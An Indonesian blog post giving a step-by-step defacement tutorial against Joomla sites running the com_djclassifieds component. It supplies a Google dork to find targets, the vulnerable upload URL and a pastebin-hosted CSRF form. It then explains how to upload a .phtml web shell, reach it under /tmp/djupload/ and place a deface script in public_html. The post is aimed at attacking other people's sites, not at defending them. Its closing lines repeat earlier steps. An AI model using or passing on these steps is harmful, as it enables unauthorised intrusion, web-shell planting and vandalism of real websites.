Wednesday, March 18, 2020
halo exploiter, pada artikel kali ini, saya akan memberikan tutorial deface exploit joomla com_djclassifieds upload shell, ok langsung aja
# Exploit Title : Com_djclassifieds Vulnerability
# Google Dork : inurl:/com_djclassifieds
# Exploit : /index.php?option=com_djclassifieds&task=upload&tmpl=component
# CSRF : https://pastebin.com/raw/EUnh5RB0
1. Dorking Menggunakan Dork diatas
2. jika sudah menemukan targetnya masukkan exploit di akhir domain site.com/exploit, contoh : site.com/index.php?option=com_djclassifieds&task=upload&tmpl=component
3. jika tampilannya sperti gambar dibawah ini, berarti vuln
4. langsung saja buka csrfnya link sudah saya taruh tadi diatas, sbelumnya kalian edit terlebih dahulu dibagian action=" truh link targetmu beserta exploitnya, dan dibagian value=" isi nama shell yg akan kalian upload, shellnya hrus berextensi .phtml
5. kalau sudah kalian buka csrfnya di browser kalian dan upload shell kalian
6. jika sudah selesai di upload muncul tanda sperti ini lagi, berarti shell sukses terupload.
7. langsung aja akses shellnya,
target.com/tmp/djupload/namashell.phtml
dan boommm..
8. ke dir /public_html/ dan upload script deface kalian
Sekian Dri saya semoga bermanfaat
Gr33tz : ./B0C1L Gans
5. kalau sudah kalian buka csrfnya di browser kalian dan upload shell kalian
target.com/tmp/djupload/namashell.phtml
dan boommm..
8. ke dir /public_html/ dan upload script deface kalian
Sekian Dri saya semoga bermanfaat
Gr33tz : ./B0C1L Gans